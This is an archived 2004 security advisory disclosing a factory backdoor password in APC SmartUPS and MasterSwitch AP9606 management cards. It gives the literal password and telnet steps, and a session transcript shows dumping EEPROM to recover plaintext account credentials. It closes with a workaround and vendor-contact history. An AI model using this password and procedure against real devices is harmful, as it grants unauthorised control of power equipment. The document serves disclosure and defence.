exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

apc_9606_backdoor.txt

apc_9606_backdoor.txt
Posted Feb 16, 2004
Authored by Dave Tarbatt | Site null.sniffing.net

APC SmartSwitch and UPS products use an HTTP/SNMP management card that have backdoor passwords in them. Tested vulnerable: SmartUPS 3000RM with AP9606 AOS v3.2.1 and SmartUPS App v3.2.6, MasterSwitch AP9212 with AP9606 AOS v3.0.3 and MasterSwitch App v2.2.0.

tags | exploit, web
SHA-256 | 0989efe070b1c7429abb7289c478d608124cb94c6c330d1264d2dceb29eed5c1

apc_9606_backdoor.txt

Change Mirror Download

*** Background:
APC (American Power Conversion) SmartSwitch and UPS (uninterruptible power
supply) products have a Web and SNMP management card installed that permits
local serial console, TELNET, web and SNMP management, monitoring and
mains power control of attached devices.


*** The Problem:
APC SmartSlot Web/SNMP management cards have a "backdoor" password that can
be abused to extract plain text username/password details for all accounts
and hence gain unauthorised full control of the device.

Tested vulnerable:
SmartUPS 3000RM with AP9606 AOS v3.2.1 and SmartUPS App v3.2.6
MasterSwitch AP9212 with AP9606 AOS v3.0.3 and MasterSwitch App v2.2.0


*** Description:
The "backdoor" password is designed for use by the factory for initial
configuration of the card, e.g. MAC Address, Serial Number etc. However, it
is possible to dump the contents of EEPROM which amongst other things
stores the account usernames and passwords.

The "backdoor" password is accepted via either the local serial port or
TELNET. Use of the password on the web interface does not appear to be
possible.


*** To recreate (typical example):
Connect a console to the serial port or TELNET to the card. At the username
prompt use any username. The password is all alphabetic characters and is
case sensitive: TENmanUFactOryPOWER

At the selection prompt, type 13 and press return. Type the byte address of
the EEPROM location to view, e.g. 1d0 and press return. Look carefully for
the username and password pairs. Different firmware revisions may have the
account details at different EEPROM locations. The accounts in the example
below are the default accounts after their passwords have been changed.
Username: apc Password: BBCCDDEEF
Username: device Password: AAAABBBBB

Press return to get back to the Factory Menu and press ctrl-A to logout.
You can now TELNET to the card again and use the account details you've
just recovered to log into and control the device.

You should use the other selections with extreme care. You may cause
irrepairable damage and will most certainly invalidate any warranty.
The EEPROM also contains other user-configurable options in either plain
text or binary encoded form. They are not detailed in this advisory.

Example:

[root@always root]# telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

User Name : phade
Password : TENmanUFactOryPOWER

Factory Menu
<CTRL-A> to exit

1AP9606
2WA0044004472
3G9
410/25/2000
500 C0 B7 A2 C8 2D
6v3.2.1
7A
8A
9192.168.1.1
A255.255.255.0
B192.168.1.254
C
D
E
F
G

Selection> 13

Enter byte address in Hex(XXXX): 1d0

01D0 FF 50 46 61 70 63 00 FF .PFapc..
01D8 FF FF FF FF FF FF 42 42 ......BB
01E0 43 43 44 44 45 45 46 00 CCDDEEF.
01E8 FF 64 65 76 69 63 65 00 .device.
01F0 FF FF FF FF 41 41 41 41 ....AAAA
01F8 42 42 42 42 42 00 FF 61 BBBBB..a
0200 64 6D 69 6E 20 75 73 65 dmin use
0208 72 20 70 68 72 61 73 65 r phrase
0210 00 FF FF FF FF FF FF FF ........
0218 FF FF FF FF FF FF FF FF ........
0220 64 65 76 69 63 65 20 75 device u
0228 73 65 72 20 70 68 72 61 ser phra
0230 73 65 00 FF FF FF FF FF se......
0238 FF FF FF FF FF FF FF FF ........
0240 FF 00 00 FF FF FF FF 21 .......!
0248 56 00 00 00 00 00 00 55 V......U

<sp>nxt,b-bck,p-pch,other-exit


*** Workaround/fix:
Ensure that access to the local serial port is physically restricted and
disable the TELNET interface as described in the device documentation. A
patched version of the firmware which requires the management password
to be entered before accessing the factory settings may be available
from APC.


*** Vendor status:
APC were first notified six months ago on 12th August 2003 and were
initially helpful in patching the problem. However, after testing a couple
of beta fixes I've heard nothing for over 3 months.

Dave Tarbatt,
http://null.sniffing.net/

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close